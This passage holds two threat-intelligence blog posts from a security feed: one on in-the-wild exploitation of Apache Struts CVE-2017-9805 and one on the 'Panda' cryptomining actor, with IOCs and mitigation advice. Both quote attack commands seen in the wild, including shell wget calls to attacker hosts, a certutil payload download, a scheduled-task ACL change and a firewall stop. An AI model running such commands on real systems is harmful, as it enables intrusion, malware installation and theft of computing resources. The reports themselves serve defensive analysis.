"2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>,&nbsp;Talos&nbsp;responded&nbsp;to&nbsp;a&nbsp;zero-day&nbsp;vulnerability that&nbsp;was under active exploitation in&nbsp;the&nbsp;wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\">&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite&lt;/string&gt;</blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\">&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`&lt;/string&gt;</blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\">&lt;string&gt;wget&lt;/string&gt;&lt;string&gt;hxxp://st2buzgajl.alifuzz[.]com/052&lt;/string&gt;</blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-09-07T15:42:00", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 &amp; Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequen